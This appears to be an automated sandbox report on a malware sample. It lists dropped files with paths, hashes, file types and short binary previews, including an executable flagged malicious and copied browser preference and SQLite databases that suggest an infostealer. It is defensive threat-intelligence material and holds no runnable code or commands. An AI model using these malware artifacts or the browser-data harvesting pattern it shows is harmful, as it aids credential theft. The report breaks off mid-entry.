Preview:	PK........DwiY(..wj...........graph.exe..{\|...8......f....D]5..HP..d..... Q@b.1.[$.\..&.p.....j.-.V..6...=P!.U@...K....>.sf7..b...._/...3....<....oY/..A...................u....].l.(...UyWuv....\x....w.......0\|_.].e........==.m.qq....v....g...~o.........~.V?@.s.......z.......#\|.o..........~.].X...%.A......>..xZ.p.0.:.2a.U..PZ...E.^.`>......+d.9..s.x..O.....+............K.2...3...9.M......k3;j.[o.*mg..U.%!...A+.....3O6T{...o....j.:.4.]m...q.{..&...?.A....Q[.\|..x.K.X....U.\|..V/,......6...\|w.s..@0BX...O.I..._..R..@~T.2.t..IK?..M.E.\|^............B._C.....-..y;....V.......,\|f.wl......:...T./4TbV.\.+..H.....2%.sZ..D.#..}.o..x..w... ..p.!..,..o ...S.]......].}.......c.w..2...<s........!.2'....m.v.><...Ox...O.(C.....@....T.o.Uwm......(ve<...x.f3..\...D..X._.G.7.3.l;..>tQ...5.e..D...lO.i{./..;.JgK........ ...tJ. I.....>..8..Pa...=.Il.S..?.)..@}...:..Cmh.;.v...T.{K..9.)Pqg.%..5.....6..<w..........`-..+h..oA...2.K.......{.."..Wu.;I..w.^o...

C:\Program Files\Windows Media Player\graph\graph.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	251392
Entropy (8bit):	6.173345887744036
Encrypted:	false
SSDEEP:	6144:TxwndeWCdXSpfDYlUgEP86yZ7JUlfQEc:Tx1dXYYlLEP8l7J8
MD5:	7D254439AF7B1CAAA765420BEA7FBD3F
SHA1:	7BD1D979DE4A86CB0D8C2AD9E1945BD351339AD0
SHA-256:	D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
SHA-512:	C3164B2F09DC914066201562BE6483F61D3C368675AC5D3466C2D5B754813B8B23FD09AF86B1F15AB8CC91BE8A52B3488323E7A65198E5B104F9C635EC5ED5CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.1!am_ram_ram_r.\sdm_r.Zs.m_rq.\skm_rq.[sqm_r.[spm_rq.Zs8m_r.^shm_ram^r.m_r.Vs`m_r.r`m_r*.]s`m_rRicham_r........PE..d...../g.........."....).\|...n.................@............................. ............`.....................................................d...............`'...................A..p...........................`@..@...............h............................text....z.......\|.................. ..`.rdata..............................@..@.data...$-..........................@....pdata..`'.......(..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\KXBASJECBA1V\3790H4

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	ASCII text, with very long lines (1046), with CRLF line terminators
Category:	dropped
Size (bytes):	11923
Entropy (8bit):	5.2717384530749305
Encrypted:	false
SSDEEP:	192:58IXrFgMqaxu7aWUBp9PXaUhK+74NMre6w/hUiCw8TPD:geuajQthyre6wZCwGD
MD5:	59AF94B2C60EC3837D8D67F15C1C4716
SHA1:	204BADE84E385B4A87F5788B822AD60E743D891D
SHA-256:	4306770AFEFFF70ABB01C6E4CEA53C280917FF1458CF679C6745028BC7D36980
SHA-512:	3D9CEF70CE911AB4C053294BECE18F503D380A6FE4762764074988356CD6E2413268ED7F34C2225F1E78E917454318977CE6C88B6D2E0BF978367A426D358881
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.installation.timestamp", "132737585657068823");..user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "29abcd1e-1a70-48c8-93bf-45f85e2f4118");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.previous.reasons", "[\"app.update.background.enabled=false\"]");..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 0);..user_pref("app.update.lastUpdateTime.background-update-timer", 0);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1629285077);..user_pref("app.update.l

C:\ProgramData\KXBASJECBA1V\3E3OP8QIM

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	0.7310370201569906
Encrypted:	false
SSDEEP:	96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
MD5:	A802F475CA2D00B16F45FEA728F2247C
SHA1:	AF57C02DA108CFA0D7323252126CC87D7B608786
SHA-256:	156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
SHA-512:	275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KXBASJECBA1V\6FUKNY

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\ProgramData\KXBASJECBA1V\6PHDT2

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KXBASJECBA1V\8YMO89

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	18
Entropy (8bit):	2.725480556997868
Encrypted:	false
SSDEEP:	3:Qkh1QNIl:Qk8W
MD5:	D1F4EBCAA7623D3DBFBF051D65AB1130
SHA1:	A51DDF1371C35784AA2AF44C5EE706285B378CF7
SHA-256:	A838F07E91D01FCF6874D4F5495F69B9E6AB483D367E0E188A809700DC0D0AAE
SHA-512:	EC32CB4736C75066947B9478B644F550D8B48510D98B4E2D065DFF2219F94D76E83AC886D9FEE795580C17C33388A8B7AA858F71754C97A34CAF976B21B17448
Malicious:	false
Preview:	..A.r.t.h.u.r.....

C:\ProgramData\KXBASJECBA1V\9ZMY5X

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\ProgramData\KXBASJECBA1V\FCBAAI

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\ProgramData\KXBASJECBA1V\GLX4O8

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\ProgramData\KXBASJECBA1V\GLXT00

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 8, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.127558825945373
Encrypted:	false
SSDEEP:	192:sV+4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:sV+4n/9p/39J6hwNKRmqu+7VusE
MD5:	5397F1C0BC53C6833D69F56B5B002013
SHA1:	57523CB0AB939296AA859BD125253E80D5FE822B
SHA-256:	E2E2B200BCB54D55D8798BF335D33AEF327A5229835FE3ED70A8245F88F339DC
SHA-512:	A9E7687DD7160D0F2FE38784AF8BAB90D270F532230DA6CB9E32F785ED8F08D6D823624A604867EDBE1CFFC8DB26C29751A9B80FC0E1D6680E5612E256FCC791
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KXBASJECBA1V\LN79ZC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\ProgramData\KXBASJECBA1V\MYC2D2

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\ProgramData\KXBASJECBA1V\NOZUKN

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\ProgramData\KXBASJECBA1V\PPHDJ58GD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.86528072116055
Encrypted:	false
SSDEEP:	96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
MD5:	8CC409C8658C3F05143C1484A1719879
SHA1:	909CDE14664C0E5F943764895E0A9DFEC7831FF5
SHA-256:	BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
SHA-512:	55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KXBASJECBA1V\Q1NGDT

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, file counter 21, database pages 54, 1st free page 10, free pages 14, cookie 0x50, schema 4, UTF-8, version-valid-for 21
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	0.8702785449902919
Encrypted:	false
SSDEEP:	384:u0ATqjAfepy42PWoo/oftTBBE3utC7UqrDvQoJMAa:rATq8feA42PWoo/oftTBBjuUVAa
MD5:	E782D8B6164B8CF64500A01B85E5FD38
SHA1:	C9D4CEAAE1A4FA6E8E74281520262B9ABCA02E18
